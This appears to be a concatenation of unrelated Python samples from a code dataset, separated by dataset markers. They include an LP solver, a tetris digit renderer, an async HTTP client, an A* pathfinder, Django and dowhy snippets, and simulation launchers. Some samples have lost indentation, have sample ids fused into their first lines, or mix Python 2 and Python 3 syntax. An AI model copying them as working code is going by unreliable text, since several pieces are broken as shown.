    def reset_lower_bound(self, lower_bound):
        """
        reset_lower_bound resets the lower bound of the LP problem.
        """
        self.lower_bound = lower_bound
        self._invalidate()

    def reset_upper_bound(self, upper_bound):
        """
        reset_upper_bound resets the upper bound of the LP problem.
        """
        self.upper_bound = upper_bound
        self._invalidate()

    @classmethod
    def _listtodict(cls, input_lst):
        """
        _listtodict converts an alternating [key, value, ...] list to a dict.
        """
        return {input_lst[i]: input_lst[i + 1] for i in range(0, len(input_lst), 2)}

    def _check_consistency(self):
        """
        Check that cost function, constraints and bounds have matching
        dimensions; the result is stored in self.consistency_flag.
        (BUG FIX: the original messages embedded large runs of whitespace
        from line continuations inside string literals; cleaned up here.)
        """
        consistency_flag = True
        if self.costfunction_matrix is not None:
            variable_length = len(self.costfunction_matrix)
            if (self.inequality_constraint_a is not None) \
                    and (self.inequality_constraint_b is not None):
                inequality_constraint_length = len(self.inequality_constraint_b)
                if self.inequality_constraint_a.shape[1] != variable_length:
                    print("The number of variables is not consistent in the cost function and in the inequality constraint.\n")
                    consistency_flag = False
                if self.inequality_constraint_a.shape[0] != inequality_constraint_length:
                    print("The number of inequality constraint number is not consistent in ineq_a and ineq_b.\n")
                    consistency_flag = False
            else:
                print("The inequality constraint is not defined for the LP problem.\n")
                consistency_flag = False
        else:
            print("The cost function matrix is not defined for the LP problem.\n")
            consistency_flag = False
        # Bound mismatches only warn; they do not fail the check (original
        # behaviour preserved).
        if consistency_flag:
            if self.upper_bound is not None and len(self.upper_bound) != variable_length:
                print("The number of variables is not consistent in the cost function and in the upper bound setup for the LP problem.\n")
            if self.lower_bound is not None and len(self.lower_bound) != variable_length:
                print("The number of variables is not consistent in the cost function and in the lower bound setup for the LP problem.\n")
        self.consistency_flag = consistency_flag
        self.canonical_flag = False

    def _form_canonical(self):
        """
        Fold the bounds into the inequality system and negate the objective
        so the problem reads: maximize c'x subject to A x <= b.
        """
        if not self.consistency_flag:
            print("The LP problem has not passed consistency check yet.\n")
            return
        variable_length = len(self.costfunction_matrix)
        self.canonical_max_kpi = -self.costfunction_matrix
        self.canonical_inequality_constraint_a = self.inequality_constraint_a
        self.canonical_inequality_constraint_b = self.inequality_constraint_b
        if self.upper_bound is not None:
            # x <= ub  ->  append  I x <= ub
            self.canonical_inequality_constraint_a = np.concatenate(
                (self.canonical_inequality_constraint_a,
                 np.identity(variable_length)), axis=0)
            self.canonical_inequality_constraint_b = np.concatenate(
                (self.canonical_inequality_constraint_b,
                 self.upper_bound), axis=0)
        if self.lower_bound is not None:
            # NOTE(review): this appends  -I x <= lb  (not <= -lb), exactly
            # as the original did — confirm callers pass lb pre-negated.
            self.canonical_inequality_constraint_a = np.concatenate(
                (self.canonical_inequality_constraint_a,
                 -np.identity(variable_length)), axis=0)
            self.canonical_inequality_constraint_b = np.concatenate(
                (self.canonical_inequality_constraint_b,
                 self.lower_bound), axis=0)
        self.canonical_flag = True

    def solve_gurobi(self):
        """
        solve_gurobi solves the LP problem using gurobipy; on success the
        optimum point/value are stored in optimum_x / optimum_y.
        """
        self._check_consistency()
        self._form_canonical()
        if self.consistency_flag and self.canonical_flag:
            variable_length = len(self.costfunction_matrix)
            self.gurobi_lp_model = gp.Model()
            self.gurobi_lp_model.Params.LogToConsole = 0  # silence solver log
            self.gurobi_lp_variable = self.gurobi_lp_model.addMVar(variable_length)
            self.gurobi_lp_model.setMObjective(None, self.canonical_max_kpi, 0.0,
                                               None, None, self.gurobi_lp_variable,
                                               gp.GRB.MAXIMIZE)
            self.gurobi_lp_model.addConstr(self.canonical_inequality_constraint_a
                                           @ self.gurobi_lp_variable <=
                                           self.canonical_inequality_constraint_b.transpose()[0])
            self.gurobi_lp_model.update()
            self.gurobi_lp_model.optimize()
            self.optimum_x = self.gurobi_lp_variable.x
            self.optimum_y = self.gurobi_lp_model.objVal
        else:
            print("The LP problem has not passed consistency check or formed into a canonical form yet.\n")

    def display_result(self):
        """
        display_result prints the optimum point and objective value
        (sign-corrected for minimization problems).
        """
        print("The optimum x variables are: \n")
        print(self.optimum_x)
        print("\n")
        if self.minimize_problem:
            print("The cost function value is: \n")
            print(-self.optimum_y)
        elif not self.minimize_problem:
            print("The likelihood function value is: \n")
            print(self.optimum_y)
        print("\n")
| StarcoderdataPython |
3415290 | import tetris_blocks
import numbersforscore
import color
class NumberToBlock:
    """Builds a tetris Block whose shape spells out a 4-digit score."""

    @staticmethod
    def get_block(number: int):
        """Render `number` (up to 4 digits) as a single red Block."""
        digits = NumberToBlock.get_list_of_single_numbers(number)
        digit_shapes = [numbersforscore.NumbersForScore.number[d] for d in digits]
        # Start from an all-zero canvas wide enough for every digit glyph.
        field = NumberToBlock.create_number_field(digit_shapes)
        glyph_width = len(digit_shapes[-1])
        for shape_idx, shape in enumerate(digit_shapes):
            for row_idx, row in enumerate(shape):
                # Glyphs are assumed square (width == height), as in the
                # original index arithmetic.
                for col_idx in range(len(shape)):
                    field[row_idx][shape_idx * glyph_width + col_idx] = row[col_idx]
        return tetris_blocks.Block([field] * 4, color.BlockColor.red)

    @staticmethod
    def create_number_field(blocks):
        """Return a zero grid: glyph-height rows x (n_digits * width) cols."""
        glyph_width = len(blocks[-1])
        return [[0] * (len(blocks) * glyph_width) for _ in range(glyph_width)]

    @staticmethod
    def get_list_of_single_numbers(number: int):
        """Split `number` into its thousands/hundreds/tens/units digits."""
        return [number // 1000 % 10, number // 100 % 10, number // 10 % 10, number % 10]
if __name__ == "__main__":
# Quick visual smoke test: render 1234 and draw it.
block = NumberToBlock.get_block(1234)
block.draw_block()
| StarcoderdataPython |
9705617 | from functools import partial
from typing import Union, Dict, Optional
from http_async_client.enums import SupportedProtocols, Methods
import httpx
import re
from dataclasses import dataclass
from httpx._types import RequestContent, URLTypes, RequestData, RequestFiles, QueryParamTypes, HeaderTypes, CookieTypes
from nanoid import generate
import base64
import threading
from httpx import Request
class EndPointRegistry(type):
    """Singleton metaclass that keeps a registry of HTTP endpoints.

    This class is the core of the HTTP client: it allows managing several
    domains with the same client class. This is useful, for example, when
    sending requests to different third-party APIs while following one
    request with a single request ID.

    Every new domain is registered on this class. On each new call it checks
    whether the domain already exists in the registry, creates an entry for
    it if not, and then marks that domain as the current one.
    """
    def __init__(cls, *args, **kwargs):
        # Registry state lives on the class object created with this metaclass.
        cls.__instance = None
        cls._locker = threading.Lock()
        cls.endpoints_registry: Dict[bytes, EndPoint] = {}
        cls.current = bytes()  # base64 key of the most recently requested endpoint
        super().__init__(*args, **kwargs)
    def __call__(cls, *args, **kwargs):
        """Create (at most once) and return the singleton instance.

        Uses double-checked locking with ``_locker`` to guarantee only one
        instance is ever built across threads.

        Arguments:
            host: string, the domain's host
            port: int : Optional
            protocol : string, must be a member of the SupportedProtocols Enum

        Returns:
            cls.__instance : the singleton instance
        """
        if cls.__instance is None:
            with cls._locker:
                if cls.__instance is None:
                    cls.__instance = super().__call__(*args, **kwargs)
        # On each call : add to registry (if it is already in the reg, it wont be added but only defined as current)
        # NOTE(review): positional args are not forwarded here — endpoint info must be passed as keywords.
        cls.add_to_reg(**kwargs)
        return cls.__instance
    def add_to_reg(cls, **kwargs):
        """Create an EndPoint and register it under its base64-encoded base URL.

        The same host with two different ports yields two distinct registry
        entries. The (possibly pre-existing) endpoint becomes ``current``
        either way.

        Arguments:
            host: string, the domain's host
            port: int : Optional
            protocol : string, must be a member of the SupportedProtocols Enum
        """
        port = kwargs.get("port", None)
        protocol = kwargs.get("protocol", None)
        host = kwargs.get("host", None)
        end_point = EndPoint(host, port, protocol)
        if not end_point.base_url:
            raise ValueError("EndPointRegistry error trying to add new client : host is missing")
        try:
            end_point_key = base64.b64encode(bytes(end_point.base_url, encoding='utf-8'))
            if end_point_key not in cls.endpoints_registry:
                cls.endpoints_registry[end_point_key] = end_point
            cls.current = end_point_key
        except TypeError as te:
            raise TypeError(f"Cannot encode base url to registry : {str(te)}")
@dataclass
class EndPoint:
    """Value object describing one remote endpoint (host, optional port, protocol name)."""
    host: str
    port: int
    _protocol: str

    @property
    def base_url(self) -> Union[bool, str]:
        """Build ``{protocol}://{host}[:{port}]``.

        Returns:
            The base URL string, or ``False`` when no host is set.
        """
        if not self.host:
            return False
        url = f"{self.protocol.value}://{self.host}"
        if self.port:
            url = f"{url}:{self.port}"
        return url

    @property
    def protocol(self) -> SupportedProtocols:
        """Resolve ``_protocol`` to a SupportedProtocols member.

        Falls back to the default http protocol when the stored name is not
        a member of the enum.
        """
        try:
            return SupportedProtocols[self._protocol]
        except KeyError:
            return SupportedProtocols.http
class BaseRESTAsyncClient(metaclass=EndPointRegistry):
    """Asynchronous REST client backed by the EndPointRegistry metaclass.

    The metaclass keeps a registry of every endpoint (protocol/host/port)
    ever requested and marks the most recently requested one as "current";
    every URL built by this class targets that current endpoint.
    """

    def __init__(self, *, host, port=None, protocol=None):
        # host/port/protocol are consumed by EndPointRegistry.__call__ via
        # **kwargs; the instance itself only tracks the per-request id.
        self._request_id = None

    @classmethod
    def get_instance(cls, *, host: str, port: Optional[int] = None,
                     protocol: Optional[str] = None) -> "partial[BaseRESTAsyncClient]":
        """Return a factory (partial) that re-selects this endpoint on every call.

        Arguments:
            host: domain's host
            port: listening port
            protocol: network protocol (must be a name of the SupportedProtocols Enum)

        Returns:
            partial function (BaseRESTAsyncClient factory)

        Example:
            ```python
            # Parameters are keyword-only; the original docstring showed a
            # positional call that would raise TypeError.
            client = BaseRESTAsyncClient.get_instance(host="example.com", port=8080, protocol="https")
            ```
        """
        return partial(BaseRESTAsyncClient, host=host, port=port, protocol=protocol)

    @property
    def request_id(self) -> Optional[str]:
        """UID (nanoid) of the current request, or ``None`` when none was set."""
        if not self._request_id:
            return None
        return str(self._request_id)

    @request_id.setter
    def request_id(self, req_id):
        """Set the request id.

        Note:
            The provided ``req_id`` is currently ignored and a fresh nanoid
            is generated instead.

        Todo:
            * Check if there is any pre existing request ID from the incoming
              request headers and generate one ONLY IF there is none.
        """
        self._request_id = generate()

    def get_base_url(self) -> str:
        """Return the base URL of the currently selected endpoint."""
        return self.endpoints_registry[self.current].base_url

    def make_url(self, url: str = "") -> str:
        """Join *url* onto the current endpoint's base URL.

        Arguments:
            url: relative URL to concatenate with the host base URL

        Returns:
            string: absolute URL including protocol, host, port (if any) and
            the relative part (if any)
        """
        url = re.sub('/+', '/', url)   # collapse duplicate slashes
        url = re.sub('^/', '', url)    # drop a single leading slash
        return f"{self.get_base_url()}/{url}"

    async def _send_request(self, req: Request):
        """Send *req* through a fresh httpx.AsyncClient and await the response.

        Arguments:
            req: a Request ([httpx](https://www.python-httpx.org/api/#request) type)

        Returns:
            coroutine: handle the HTTP response by awaiting it
        """
        async with httpx.AsyncClient() as client:
            return await client.send(req)

    async def get(self,
                  url: URLTypes = "",
                  *,
                  params: QueryParamTypes = None,
                  headers: HeaderTypes = None,
                  cookies: CookieTypes = None):
        """Prepare an HTTP `GET` request and send it asynchronously.

        Arguments:
            url: relative URL (from the base URL)
            params: query string
            headers: HTTP headers (key/value)
            cookies: HTTP cookies

        Returns:
            coroutine: result of ``_send_request``; await it to get the response
        """
        request = Request(Methods.get.value, self.make_url(url), params=params, headers=headers, cookies=cookies)
        return await self._send_request(request)

    async def post(self,
                   url: URLTypes = "",
                   *,
                   headers: HeaderTypes = None,
                   cookies: CookieTypes = None,
                   content: RequestContent = None,
                   data: RequestData = None,
                   files: RequestFiles = None):
        """Prepare an HTTP `POST` request and send it asynchronously.

        Arguments:
            url: relative URL (from the base URL)
            headers: HTTP headers (key/value)
            cookies: HTTP cookies
            content: anything that is NOT form-encoded, multipart or JSON
                (e.g. raw text or binaries)
            data: JSON, files, form data
            files: blob stream

        Returns:
            coroutine: result of ``_send_request``; await it to get the response
        """
        request = Request(Methods.post.value, self.make_url(url),
                          content=content,
                          data=data,
                          files=files,
                          headers=headers,
                          cookies=cookies)
        return await self._send_request(request)

    async def put(self,
                  url: URLTypes = "",
                  *,
                  headers: HeaderTypes = None,
                  cookies: CookieTypes = None,
                  data: RequestData = None):
        """Prepare an HTTP `PUT` request and send it asynchronously.

        Arguments:
            url: relative URL (from the base URL)
            headers: HTTP headers (key/value)
            cookies: HTTP cookies
            data: JSON, files, form data

        Returns:
            coroutine: result of ``_send_request``; await it to get the response
        """
        request = Request(Methods.put.value, self.make_url(url),
                          data=data,
                          headers=headers,
                          cookies=cookies)
        return await self._send_request(request)

    async def patch(self,
                    url: URLTypes = "",
                    *,
                    headers: HeaderTypes = None,
                    cookies: CookieTypes = None,
                    data: RequestData = None):
        """Prepare an HTTP `PATCH` request and send it asynchronously.

        Arguments:
            url: relative URL (from the base URL)
            headers: HTTP headers (key/value)
            cookies: HTTP cookies
            data: JSON, files, form data

        Returns:
            coroutine: result of ``_send_request``; await it to get the response
        """
        request = Request(Methods.patch.value, self.make_url(url),
                          data=data,
                          headers=headers,
                          cookies=cookies)
        return await self._send_request(request)

    async def delete(self,
                     url: URLTypes = "",
                     *,
                     params: QueryParamTypes = None,
                     headers: HeaderTypes = None,
                     cookies: CookieTypes = None):
        """Prepare an HTTP `DELETE` request and send it asynchronously.

        Arguments:
            url: relative URL (from the base URL)
            params: query string
            headers: HTTP headers (key/value)
            cookies: HTTP cookies

        Returns:
            coroutine: result of ``_send_request``; await it to get the response
        """
        request = Request(Methods.delete.value, self.make_url(url), params=params, headers=headers, cookies=cookies)
        return await self._send_request(request)

    def __call__(self, *args, **kwargs):
        """Forbid calling instances directly; use the get_instance class method."""
        raise TypeError("BaseClient cannot be called directly use get_instance class method instead")
# Public entry point: callers obtain clients via async_client_factory(host=..., ...)().
async_client_factory = BaseRESTAsyncClient.get_instance
| StarcoderdataPython |
9658222 | import heapq
class Elem(object):
    """A single grid cell with A* bookkeeping (costs and parent link)."""

    def __init__(self, x, y, reachable):
        self.reachable = reachable  # 1 = free, 0 = blocked
        self.x = x
        self.y = y
        self.parent = None  # predecessor on the best known path
        self.g_cost = 0     # cost from the start cell (10 per step)
        self.h_cost = 0     # heuristic estimate to the goal
        self.f_cost = 0     # g_cost + h_cost


class AStar(object):
    """A* path finder over a rectangular occupancy grid.

    ``grid[y][x]`` is 0 for free and 1 for blocked cells; movement is
    4-connected with a uniform step cost of 10 and a Manhattan-distance
    heuristic.

    Fixes over the original implementation:
      * ``range`` instead of Python-2-only ``xrange``;
      * heap entries carry a monotonic tie-breaker, so equal f-costs never
        fall back to comparing ``Elem`` objects (a TypeError on Python 3);
      * the O(n) membership test against stale ``(f_cost, cell)`` tuples is
        replaced by a dict of the best g-cost pushed per cell;
      * the heuristic is measured from the neighbour itself (the original
        mistakenly measured it from the cell being expanded).
    """

    def __init__(self, grid, start, end):
        """*start* and *end* are (x, y) tuples indexing into grid[y][x]."""
        self.open_cells = []
        heapq.heapify(self.open_cells)
        self.closed = set()
        self.cells = []
        self.grid_height = len(grid)
        self.grid_width = len(grid[0])
        # Cells are stored column-major: index = x * grid_height + y.
        for x in range(self.grid_width):
            for y in range(self.grid_height):
                self.cells.append(Elem(x, y, 1 - grid[y][x]))
        self.start = self.get_elem(*start)
        self.end = self.get_elem(*end)

    def get_elem(self, x, y):
        """Return the Elem stored for grid position (x, y)."""
        return self.cells[x * self.grid_height + y]

    def _neighbours(self, cell):
        """Yield the 4-connected neighbours of *cell* that lie inside the grid."""
        if cell.x < self.grid_width - 1:
            yield self.get_elem(cell.x + 1, cell.y)
        if cell.y > 0:
            yield self.get_elem(cell.x, cell.y - 1)
        if cell.x > 0:
            yield self.get_elem(cell.x - 1, cell.y)
        if cell.y < self.grid_height - 1:
            yield self.get_elem(cell.x, cell.y + 1)

    def _reconstruct_path(self):
        """Walk parent links back from the goal and return the start->goal path."""
        cell = self.end
        path = [(cell.x, cell.y)]
        while cell.parent is not self.start:
            cell = cell.parent
            path.append((cell.x, cell.y))
        path.append((self.start.x, self.start.y))
        path.reverse()
        return path

    def solve(self):
        """Return the path from start to end as a list of (x, y) tuples, or None."""
        tie = 0  # monotonic tie-breaker so equal f-costs never compare Elem objects
        heapq.heappush(self.open_cells, (self.start.f_cost, tie, self.start))
        best_g = {self.start: 0}  # cheapest g_cost pushed so far, per cell
        while len(self.open_cells):
            f, _, cell = heapq.heappop(self.open_cells)
            if cell in self.closed:
                continue  # stale heap entry superseded by a cheaper push
            self.closed.add(cell)
            if cell is self.end:
                return self._reconstruct_path()
            for adj in self._neighbours(cell):
                if adj.reachable != 1 or adj in self.closed:
                    continue
                g = cell.g_cost + 10
                if adj not in best_g or g < best_g[adj]:
                    best_g[adj] = g
                    adj.g_cost = g
                    adj.h_cost = abs(adj.x - self.end.x) + abs(adj.y - self.end.y)
                    adj.parent = cell
                    adj.f_cost = adj.g_cost + adj.h_cost
                    tie += 1
                    heapq.heappush(self.open_cells, (adj.f_cost, tie, adj))
        return None
if __name__ == "__main__":
    # Demo: solve a fixed occupancy grid (1 = blocked) and print it with the
    # found path marked by '*'.
    # NOTE(review): this demo uses Python 2 syntax (xrange, print statements)
    # and will not run under Python 3.
    map_arr = [[0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0],
               [0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0],
               [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
               [1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
               [0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
               [0,0,1,0,0,0,1,1,1,1,1,1,0,0,0,0,0,0],
               [0,0,1,0,0,0,1,1,1,1,1,1,0,0,0,0,0,0],
               [0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,1,0],
               [0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,1,1],
               [0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,1,1,1],
               [0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,1,1],
               [0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,1,0],
               [0,0,0,0,0,0,1,1,1,0,0,0,0,0,0,0,0,0],
               [0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0],
               [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
               [0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0],
               [0,0,0,0,0,0,0,0,1,1,0,0,0,1,1,1,1,0],
               [0,0,0,0,0,0,0,0,1,1,1,0,0,1,1,1,1,0],
               [0,0,0,0,0,0,0,1,1,1,0,0,0,1,1,1,1,0],
               [0,0,0,0,0,0,0,0,1,1,0,0,0,1,1,1,1,1]]
    astar = AStar(map_arr,(1,11),(13,1))
    path = astar.solve()
    # Rows are y, columns are x, so the path lookup uses (j, i).
    for i in xrange(len(map_arr)):
        for j in xrange(len(map_arr[0])):
            if (j,i) in path:
                print '*',
            else:
                print map_arr[i][j],
        print
3432699 | import pytest
import dowhy.datasets
from dowhy import CausalModel
class TestCausalModel(object):
    """Construction tests for CausalModel with graphs supplied as GML strings."""

    @pytest.mark.parametrize(["beta", "num_instruments", "num_samples"],
                             [(10, 1, 100),])
    def test_graph_input(self, beta, num_instruments, num_samples):
        """A model built from a GML graph missing two common causes should
        re-add the missing dataset columns as confounders."""
        dataset = dowhy.datasets.linear_dataset(
            beta=beta,
            num_common_causes=5,
            num_instruments=num_instruments,
            num_samples=num_samples,
            treatment_is_binary=True,
        )
        common_kwargs = dict(
            data=dataset['df'],
            treatment=dataset["treatment_name"],
            outcome=dataset["outcome_name"],
            proceed_when_unidentifiable=True,
            test_significance=None,
        )
        # Building against the full generated graph must succeed.
        CausalModel(graph=dataset["gml_graph"], **common_kwargs)
        # The same graph with two common causes (X3, X4) removed.
        gml_str = 'graph[directed 1node[ id "v" label "v"]node[ id "y" label "y"]node[ id "Unobserved Confounders" label "Unobserved Confounders"]edge[source "v" target "y"]edge[source "Unobserved Confounders" target "v"]edge[source "Unobserved Confounders" target "y"]node[ id "X0" label "X0"] edge[ source "X0" target "v"] node[ id "X1" label "X1"] edge[ source "X1" target "v"] node[ id "X2" label "X2"] edge[ source "X2" target "v"] edge[ source "X0" target "y"] edge[ source "X1" target "y"] edge[ source "X2" target "y"] node[ id "Z0" label "Z0"] edge[ source "Z0" target "v"]]'
        model = CausalModel(graph=gml_str,
                            missing_nodes_as_confounders=True,
                            **common_kwargs)
        assert all(node_name in model._common_causes for node_name in ["X3", "X4"])
| StarcoderdataPython |
4882284 | <filename>pages/views.py
from django.shortcuts import render
from schedule.models import Routine,Schedule
from schedule.views import get_routine
from academicnotice.models import AcademicNotice
from ClassNotice.models import ClassNotice
from Assignments.models import Assignments
# Create your views here.
def HomePageView(request):
    """Render the home page with today's routine, notices and assignments.

    NOTE(review): ``Schedule.objects.all()[0]`` raises IndexError when no
    Schedule rows exist — presumably a schedule row is always seeded.
    """
    day = Schedule.objects.all()[0]
    context = {
        "day": day,
        "routine": get_routine(str(day)),
        "academic_notices": AcademicNotice.objects.all(),
        "class_notices": ClassNotice.objects.all(),
        # Only the four most recent assignments are shown.
        "assignments": Assignments.objects.all()[:4],
    }
    return render(request, 'home.html', context)
| StarcoderdataPython |
1720472 | <reponame>ankur198/TravelLite
# Generated by Django 2.0.4 on 2018-05-07 05:12
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated Django migration (see file header); adds the
    # companyName CharField to the hotel model. Do not edit by hand.
    dependencies = [
        ('travellite', '0001_initial'),
    ]
    operations = [
        migrations.AddField(
            model_name='hotel',
            name='companyName',
            field=models.CharField(default='hotel', max_length=30),
        ),
    ]
| StarcoderdataPython |
3204172 | from .academicIO import AnalogInput, AnalogOutput, DigitalInputOutput, Encoder, PWM, LEDs, I2C, SPI, ButtonIRQ, DIIRQ, AIIRQ, TimerIRQ, UART, Button
from .enums import * | StarcoderdataPython |
3388382 | <gh_stars>0
# Python
import os
import sys
import traceback
# Pycompss
from pycompss.api.task import task
from pycompss.api.parameter import FILE_IN, FILE_OUT
# Adapters commons pycompss
from biobb_adapters.pycompss.biobb_commons import task_config
# Wrapped Biobb
from biobb_md.gromacs.grompp import Grompp # Importing class instead of module to avoid name collision
# Maximum wall-clock seconds a PyCOMPSs task may run before timing out (0 = no limit).
task_time_out = int(os.environ.get('TASK_TIME_OUT', 0))
@task(input_gro_path=FILE_IN, input_top_zip_path=FILE_IN, output_tpr_path=FILE_OUT, input_cpt_path=FILE_IN, input_ndx_path=FILE_IN, input_mdp_path=FILE_IN,
      on_failure="IGNORE", time_out=task_time_out)
def _grompp(input_gro_path, input_top_zip_path, output_tpr_path, input_cpt_path, input_ndx_path, input_mdp_path, properties, **kwargs):
    # PyCOMPSs task wrapper around biobb_md's Grompp. Runs on a remote worker,
    # so stdout/stderr are flushed explicitly before the task finishes.
    task_config.pop_pmi(os.environ)
    try:
        Grompp(input_gro_path=input_gro_path, input_top_zip_path=input_top_zip_path, output_tpr_path=output_tpr_path, input_cpt_path=input_cpt_path, input_ndx_path=input_ndx_path, input_mdp_path=input_mdp_path, properties=properties, **kwargs).launch()
    except Exception as e:
        # Print the full traceback on the worker before propagating.
        traceback.print_exc()
        raise e
    finally:
        sys.stdout.flush()
        sys.stderr.flush()
def grompp(input_gro_path, input_top_zip_path, output_tpr_path, input_cpt_path=None, input_ndx_path=None, input_mdp_path=None, properties=None, **kwargs):
    # Restart support: skip re-execution when the expected output already exists.
    # NOTE(review): the trailing "and True" looks like a template artifact.
    if (output_tpr_path is None or os.path.exists(output_tpr_path)) and \
       True:
        print("WARN: Task Grompp already executed.")
    else:
        _grompp( input_gro_path, input_top_zip_path, output_tpr_path, input_cpt_path, input_ndx_path, input_mdp_path, properties, **kwargs)
1603879 | from multiprocessing import Process
import os
import time
# git remote set-url origin https://mgrecu35@github.com/mgrecu35/cmbv7.git
def info(title):
    """Debug helper: print *title* plus module name, parent pid and own pid."""
    print(title)
    print('module name:', __name__)
    print('parent process:', os.getppid())
    print('process id:', os.getpid())
def fsh(fname):
    """Run the combined algorithm on one DPR granule file via bpsh.

    The last four dot-separated fields of *fname* encode version/orbit info
    and are reused to name the output and log files under out/.
    """
    fields = fname.split('.')[-4:]
    out_file = "out/cmb.%s.%s.%s" % (fields[0], fields[1], fields[3])
    cmd = 'bpsh 245 ./combAlg.exe %s %s>&out/out.%s' % (fname, out_file, fields[1])
    print(cmd)
    os.system(cmd)
    time.sleep(1)
import glob
if __name__ == '__main__':
    # Fan out one worker process per input granule file and wait for all of
    # them; timings for the first day and overall are printed at the end.
    # NOTE(review): the loop runs for a single day and immediately pins
    # iday to 1, so the range is effectively dead code.
    for iday in range(1,2):
        iday=1
        fs=glob.glob("/gpmdata/2018/08/%2.2i/radar/2A.GPM.DPR.V8*"%iday)
        fs=sorted(fs)
        jobs=[]
        t1=time.time()
        if iday==1:
            t11=t1  # remember the very first day's start time
        for f in fs:
            p = Process(target=fsh, args=(f,))
            jobs.append(p)
            p.start()
        for j in jobs:
            j.join()
        print('all done')
        print(time.time()-t1)
        print(time.time()-t11)
| StarcoderdataPython |
4900986 | import hashlib
from hvm import constants
from hvm.utils.numeric import (
ceil32,
)
def sha256(computation):
    """SHA256 precompile: charge gas, hash the call data, set the output.

    Gas cost is GAS_SHA256 plus GAS_SHA256WORD for every (rounded-up)
    32-byte word of input data. Returns the mutated *computation*.
    """
    word_count = ceil32(len(computation.msg.data)) // 32
    gas_fee = constants.GAS_SHA256 + word_count * constants.GAS_SHA256WORD
    computation.consume_gas(gas_fee, reason="SHA256 Precompile")
    input_bytes = computation.msg.data
    # Renamed from ``hash``, which shadowed the builtin of the same name.
    digest = hashlib.sha256(input_bytes).digest()
    computation.output = digest
    return computation
| StarcoderdataPython |
5003278 | from sklearn import preprocessing
from xgboost import XGBClassifier
from classifiers.abs_classifier import ABSClassifier
class XGBoostScaledOptuna(ABSClassifier):
    """XGBoost classifier on standard-scaled features.

    The hyperparameters below are the best trial found by an Optuna search.
    """

    def __init__(self):
        self.clf = XGBClassifier(booster="dart",
                                 alpha=2.1585186469130006e-06,
                                 max_depth=9,
                                 eta=1.2008186006089662e-05,
                                 gamma=2.6586554392733573e-06,
                                 grow_policy="lossguide",
                                 sample_type="uniform",
                                 normalize_type="forest",
                                 rate_drop=0.6820563384069672,
                                 skip_drop=0.05004706702962791,
                                 reg_lambda=0.33733524039826585)
        self.scaler = preprocessing.StandardScaler()
        self.is_trained = False

    def train(self, X_train, y_train, X_val=None, y_val=None):
        """Fit the scaler and model on the training data and report accuracy.

        Validation accuracy is only reported when both X_val and y_val are
        supplied (the original code crashed on the default None values).
        """
        X_train_scaled = self.scaler.fit_transform(X_train)
        self.clf.fit(X_train_scaled, y_train)
        self.is_trained = True
        # Output accuracy of classifier
        print("Training Score: \t{:.5f}".format(self.clf.score(X_train_scaled, y_train)))
        if X_val is not None and y_val is not None:
            X_val_scaled = self.scaler.transform(X_val)
            print("Validation Score: \t{:.5f}".format(self.clf.score(X_val_scaled, y_val)))

    def predict(self, X):
        """Scale *X* with the fitted scaler and return class predictions."""
        if self.is_trained is False:
            # Message previously referred to the wrong classifier ("RFScaled").
            print("WARN: XGBoostScaledOptuna was not trained but predict was called")
        X_scaled = self.scaler.transform(X)
        return self.clf.predict(X_scaled)
| StarcoderdataPython |
220483 | # точка в правоъгълник
# Проверка дали точка {x, y} се намира вътре в правоъгълника {x1, y1} – {x2, y2}. Входните данни се четат от конзолата и се състоят от 6 реда:
# десетичните числа x1, y1, x2, y2, x и y (като се гарантира, че x1 < x2 и y1 < y2).
x1 = float(input())
y1 = float(input())
x2 = float(input())
y2 = float(input())
x = float(input())
y = float(input())
if x1 <= x <= x2 and y1 <= y <= y2:
print('Inside')
else:
print('Outside') | StarcoderdataPython |
353550 | import argparse
import os
description="""
Quick-and-dirty way of simulating a beam profile by using an arbitrary
number of processed. The principle of operation is to divide the discrete
simulation grid into N equal sizes (outer index).
"""
if __name__ == "__main__":
    # NOTE(review): the print statements below are Python 2 syntax; this
    # script will not run under Python 3 without conversion.
    parser = argparse.ArgumentParser(description=description)
    parser.add_argument("h5_base", help="Base part of HDF5 files (or final output if only one CPU) [without .h5]")
    parser.add_argument("matlab_exe", help="Path to Matlab executable")
    parser.add_argument("matlab_script", help="Name of .m simulation script")
    parser.add_argument("--x_min", type=float, default=-2e-2)
    parser.add_argument("--x_max", type=float, default=2e-2)
    parser.add_argument("--num_x", type=int, default=8)
    parser.add_argument("--y_min", type=float, default=-2e-2)
    parser.add_argument("--y_max", type=float, default=2e-2)
    parser.add_argument("--num_y", type=int, default=8)
    parser.add_argument("--z_min", type=float, default=1e-3)
    parser.add_argument("--z_max", type=float, default=160e-3)
    parser.add_argument("--num_z", type=float, default=32)
    parser.add_argument("--num_processes", help="Number of processes to split (=num CPUs to use)", type=int, default=1)
    args = parser.parse_args()
    # create Matlab code for creating geometry struct.
    struct_str = "struct('x_min',%e,'x_max',%e,'num_x',%d,'y_min',%e,'y_max',%e,'num_y',%d,'z_min',%e,'z_max',%e,'num_z',%d)"\
        % (args.x_min,args.x_max,args.num_x,args.y_min,args.y_max,args.num_y,args.z_min,args.z_max,args.num_z)
    # Launch one Matlab run per process slot; each writes its own HDF5 part.
    for job_no in range(args.num_processes):
        cur_h5_out = "%s_%d_of_%d.h5" % (args.h5_base, job_no+1, args.num_processes)
        cmd = "%s -nosplash -nodesktop -r \"%s(%s, '%s', [%d,%d]);exit;\" " % (args.matlab_exe, args.matlab_script, struct_str, cur_h5_out, args.num_processes, job_no+1)
        print "=== JOB %d ===" % job_no
        print cmd
        os.system(cmd)
| StarcoderdataPython |
6575815 | <reponame>readerbench/ReaderBench<gh_stars>1-10
from enum import Enum, auto
from rb.core.pos_features.pos_feature import POSFeature
from rb.core.pos_features.ro_pos_features.ro_features_name import RoFeaturesName
from rb.core.lang import Lang
from rb.core.pos import POS
from typing import List
